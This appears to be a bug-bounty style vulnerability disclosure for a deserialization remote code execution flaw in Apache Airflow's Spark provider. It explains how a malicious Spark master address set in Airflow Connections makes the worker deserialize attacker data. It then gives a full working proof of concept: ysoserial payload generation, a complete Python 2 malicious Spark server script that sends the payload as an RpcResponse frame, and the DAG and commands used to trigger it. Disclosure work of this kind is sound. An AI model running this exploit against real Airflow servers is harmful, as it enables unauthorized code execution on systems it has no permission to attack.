Apache Airflow Spark Provider deserialization vulnerability. After a malicious Spark server address is configured through the Connections page of the Airflow UI, the attacker's server can feed malicious serialized data to the PySpark client, resulting in an RCE attack on the Airflow server.
## Vulnerability principle
1. Spark principle: the Spark protocol is based on RPC communication, and each RPC exchange is a serialization/deserialization round trip. An attacker who controls one end of the connection can therefore make the other end deserialize attacker-controlled data and invoke arbitrary Java methods, achieving RCE.
2. A malicious client can attack the Spark server through deserialization, and a malicious server can likewise attack the client. In the Airflow scenario, PySpark acts as a client that connects to the Spark server through the Spark Provider, so an attacker only needs to construct a malicious server to attack Airflow's Spark client.
The command that triggers deserialization is as follows:
**spark-submit --master spark://evil_ip:port**
Therefore, an attacker can configure a malicious IP and port through the Connections page of the Airflow UI; when the above command is executed, the deserialization is triggered.
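For illustration, here is a minimal sketch (assuming the spark_default connection configured in step 1 below; not the provider's verbatim code path) of how the Spark provider's SparkSubmitHook turns the connection's Host and Port into the --master argument:
```
# Sketch only: the connection configured in the Airflow UI flows into the
# spark-submit command line that the provider spawns on the worker.
from airflow.providers.apache.spark.hooks.spark_submit import SparkSubmitHook

hook = SparkSubmitHook(conn_id="spark_default")  # reads Host/Port from the connection
# Internally this ends up spawning roughly:
#   spark-submit --master spark://172.31.76.174:8888 --name arrow-spark /tmp/file
hook.submit(application="/tmp/file")
```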
## Vulnerability exploitation process
1. Create a new 'Spark' connection named 'spark_default', and configure its Host and Port parameters.
Host: spark://172.31.76.174
Port: 8888
# 172.31.76.174 is the attacker's malicious Spark server address.
{F2648714}
{F2648715}
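Equivalently (assuming CLI access to the Airflow host; flags as in the Airflow 2.x `airflow connections add` command), the same connection can be created from the command line:
**airflow connections add 'spark_default' --conn-type 'spark' --conn-host 'spark://172.31.76.174' --conn-port '8888'**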
2. The attacker generates malicious serialized data (exp.der) with the deserialization tool ysoserial.
**Tool URL: https://github.com/frohoff/ysoserial**
The attacker locally executes the following command:
**"C:\Program Files\Java\jre1.8.0_361\bin\java" -jar ysoserial.jar CommonsCollections4 "touch /tmp/thisisRCE" > exp.der**
# touch /tmp/thisisRCE is the malicious command to be executed on Airflow.
{F2648716}
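As an optional sanity check (not part of the original steps): any Java serialization stream begins with the magic bytes AC ED 00 05, so the generated payload can be verified before use:
```
# Optional check: a Java serialization stream starts with magic 0xACED
# followed by stream version 0x0005.
with open("exp.der", "rb") as f:
    assert f.read(4) == b"\xac\xed\x00\x05", "not a Java serialization stream"
```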
3. The attacker starts the malicious Spark server locally and specifies the malicious serialized data to transmit:
**python2 evil_spark_server.py 8888 exp.der**
{F2648717}
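Before triggering the DAG, it may help to confirm the listener is reachable from the Airflow host (assuming nc is available; any TCP connectivity check works):
**nc -vz 172.31.76.174 8888**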
4. Enter the DAGs menu, select the example_spark_operator DAG, and choose "Trigger DAG w/ config".
https://localhost:8080/trigger?dag_id=example_spark_operator
{F2648718}
5. The final command executed by the worker is as follows:
**spark-submit --master spark://172.31.76.174:8888 --name arrow-spark /tmp/file**
The logs and the server output show that the arbitrary command was executed successfully.
{F2648719}
The malicious server accepted the request and sent the malicious payload.
{F2648720}
The malicious command was successfully executed on the Airflow Worker Server.
{F2648722}
**evil_spark_server.py**
```
#!/usr/bin/python2
# Minimal malicious Spark "server": replies to the client's RpcRequest with a
# crafted RpcResponse frame whose body is the ysoserial payload, so the
# connecting client deserializes it.
import os
import sys
import struct
from SocketServer import BaseRequestHandler, ThreadingTCPServer

class EchoHandler(BaseRequestHandler):
    def handle(self):
        print 'Got connection from %s' % (str(self.client_address))
        while True:
            msg = self.request.recv(8192)
            print msg
            if not msg:
                break
            if len(msg) > 16:
                print "Send msg>>>"
                # Bytes 9..16 of the client's frame hold the request id;
                # echo it back so the response is matched to the request.
                self.request.send(build_msg(msg[9:17]))

def build_msg(request_id):
    payloadObj = open(sys.argv[2], 'rb').read()
    msg_type = '\x04'  # message type 4: RpcResponse
    head_length = 21   # 8 (frame len) + 1 (type) + 8 (request id) + 4 (body len)
    # Frame: total length, type, echoed request id, body length, payload.
    msg = struct.pack('>Q', len(payloadObj) + head_length) + msg_type + request_id
    msg += struct.pack('>I', len(payloadObj)) + payloadObj
    return msg

if __name__ == '__main__':
    if len(sys.argv) < 3:
        print 'Usage: python %s <port> <payload_file>' % os.path.basename(sys.argv[0])
        sys.exit()
    serv = ThreadingTCPServer(('0.0.0.0', int(sys.argv[1])), EchoHandler)
    print "Server listening on 0.0.0.0:%s" % (sys.argv[1])
    serv.serve_forever()
```
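The frame built by build_msg mirrors Spark's wire format: an 8-byte big-endian total length, a 1-byte message type (0x04, which corresponds to RpcResponse), the 8-byte request id echoed from the client's RpcRequest, a 4-byte body length, and finally the raw serialized payload, which the client deserializes on receipt.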
**DAG Demo (example_spark.py):**
```
from datetime import datetime

from airflow.models import DAG
from airflow.providers.apache.spark.operators.spark_jdbc import SparkJDBCOperator
from airflow.providers.apache.spark.operators.spark_sql import SparkSqlOperator
from airflow.providers.apache.spark.operators.spark_submit import SparkSubmitOperator

with DAG(
    dag_id='example_spark_operator',
    schedule_interval=None,
    start_date=datetime(2021, 1, 1),
    catchup=False,
    tags=['example'],
) as dag:
    # [START howto_operator_spark_submit]
    submit_job = SparkSubmitOperator(
        application="/tmp/file", task_id="submit_job"
    )
    # [END howto_operator_spark_submit]

    # [START howto_operator_spark_jdbc]
    jdbc_to_spark_job = SparkJDBCOperator(
        cmd_type='jdbc_to_spark',
        jdbc_table="foo",
        spark_jars="${SPARK_HOME}/jars/postgresql-42.2.12.jar",
        jdbc_driver="org.postgresql.Driver",
        metastore_table="bar",
        save_mode="overwrite",
        save_format="JSON",
        task_id="jdbc_to_spark_job",
    )

    spark_to_jdbc_job = SparkJDBCOperator(
        cmd_type='spark_to_jdbc',
        jdbc_table="foo",
        spark_jars="${SPARK_HOME}/jars/postgresql-42.2.12.jar",
        jdbc_driver="org.postgresql.Driver",
        metastore_table="bar",
        save_mode="append",
        task_id="spark_to_jdbc_job",
    )
    # [END howto_operator_spark_jdbc]

    # [START howto_operator_spark_sql]
    sql_job = SparkSqlOperator(sql="SELECT * FROM bar", master="local", task_id="sql_job")
    # [END howto_operator_spark_sql]
```
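For completeness (assuming CLI access; only the submit_job task is needed to reach the malicious master), the DAG can also be triggered from the command line:
**airflow dags trigger example_spark_operator**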
## Impact
RCE: an attacker can execute arbitrary commands on the Airflow worker server.